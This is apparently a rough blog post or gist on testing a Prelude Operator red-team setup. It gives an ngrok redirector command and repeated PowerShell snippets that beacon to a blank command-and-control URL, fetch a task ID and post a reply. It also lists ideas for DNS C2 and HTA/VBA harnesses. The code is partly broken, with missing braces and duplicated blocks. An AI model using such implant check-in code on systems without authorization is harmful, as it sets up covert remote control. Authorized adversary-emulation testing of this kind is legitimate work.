Simple Powershell Prelude Operator Quick Check
In this example, we will use
There are a couple ways to redirect HTTP.
You should replace this with either your ngrok instance or your redirector.
The preferred method is a Gateway Redirector.
Cloudy with a chance of redirectors
Ngrok Example -
ngrok http --region=us 3391
Deploy a Cloud Gateway Redirector
$PreludeHTTPDomain = ""
$Executors = @()
$Executors += 'psh'
$Links = @()
$jsonBase = [pscustomobject]@{
Name = "Boomer"
Target = ""
Hostname = "APTz"
Location = ""
Platform = "windows"
Executors = $executors
Range = "BoomTown"
"Pwd" = ""
"Sleep" = 10
Executing= ""
Links = $Links
$delivery = $jsonBase | ConvertTo-Json
# Checkin - Get Task
$response = Invoke-RestMethod -Uri $PreludeHTTPDomain -Method Post -Body $delivery -ContentType "application/json"
$ID = $response.links.ID
You should have a call back
$PreludeHTTPDomain = ""
$Executors = @()
$Executors += 'psh'
$Links = @()
$jsonBase = [pscustomobject]@{
Name = "Boomer"
Target = ""
Hostname = "APTz"
Location = ""
Platform = "windows"
Executors = $executors
Range = "BoomTown"
"Pwd" = ""
"Sleep" = 10
Executing= ""
Links = $Links
$delivery = $jsonBase | ConvertTo-Json
# Checkin - Get Task
$response = Invoke-RestMethod -Uri $PreludeHTTPDomain -Method Post -Body $delivery -ContentType "application/json"
$ID = $response.links.ID
# Send Response
$Links += [pscustomobject]@{
'Request'= ""
'Response'="Ready To Roll Out!";
$jsonBase = [pscustomobject]@{
Name = "Boomer"
Target = ""
Hostname = "APTz"
Location = ""
Platform = "windows"
Executors = $executors
Range = "BoomTown"
"Pwd" = ""
"Sleep" = 10
Executing= ""
Links = $Links
$deliveryResponse = $jsonBase | ConvertTo-Json
$response_delivery = Invoke-RestMethod -Uri $PreludeHTTPDomain -Method Post -Body $deliveryResponse -ContentType "application/json"
The aim here is to help ensure you are up and running quick. Once you pass the check you are ready to start deploying more aggressive tests.
This is pretty rough, and can be better, but its a start ;-) Feedback Welcome. -Additional Idea:
Fiddler debugging
Simple DNS C2, etc..
WSH Harnesses, JSScript, VBScript, VBA, HTA, SCT etc...
These are just some prototypes.